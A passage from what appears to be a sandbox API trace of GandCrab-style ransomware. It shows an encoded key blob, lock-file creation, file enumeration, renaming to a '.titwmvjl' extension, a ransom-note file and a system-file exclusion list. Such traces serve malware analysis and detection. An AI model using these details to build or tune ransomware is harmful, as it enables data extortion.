\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.973] WriteFile (in: hFile=0x2e4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e068, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e068*=0x2162, lpOverlapped=0x0) returned 1 [0073.974] CloseHandle (hObject=0x2e4) returned 1 [0073.974] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.974] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.974] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x13, wMilliseconds=0x125)) [0073.974] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.975] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.975] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.975] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock") returned 126 [0073.975] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2e4 [0073.975] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.976] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\") returned 102 [0073.976] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*" [0073.976] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", fInfoLevelId=0x1, lpFindFileData=0x259e084, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e084) returned 0x5033b8 [0073.976] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.976] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0073.977] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.977] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.977] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0073.977] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.978] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.978] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock" [0073.978] lstrlenW (lpString=".titwmvjl") returned 9 [0073.978] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock") returned 126 [0073.978] VirtualAlloc (lpAddress=0x0, dwSize=0x13c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.978] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 135 [0073.978] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock") returned 126 [0073.978] lstrlenW (lpString=".lock") returned 5 [0073.978] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.978] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.978] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.978] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.979] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0073.979] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.979] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.979] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt" [0073.979] lstrlenW (lpString=".titwmvjl") returned 9 [0073.979] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt") returned 122 [0073.979] VirtualAlloc (lpAddress=0x0, dwSize=0x134, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.979] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 131 [0073.979] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt") returned 122 [0073.979] lstrlenW (lpString=".txt") returned 4 [0073.979] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.979] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.979] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.979] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.979] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt") returned 122 [0073.980] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt") returned 122 [0073.980] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.980] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.980] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.980] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.980] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.980] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.980] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.980] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.980] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.980] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0073.980] lstrcmpW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2=".") returned 1 [0073.980] lstrcmpW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="..") returned 1 [0073.980] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03090430[[fn=Banded]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx" [0073.980] lstrlenW (lpString=".titwmvjl") returned 9 [0073.980] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned 130 [0073.980] VirtualAlloc (lpAddress=0x0, dwSize=0x144, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.980] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx.titwmvjl") returned 139 [0073.980] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned 130 [0073.980] lstrlenW (lpString=".thmx") returned 5 [0073.980] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.980] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0073.980] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0073.981] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.981] lstrlenW 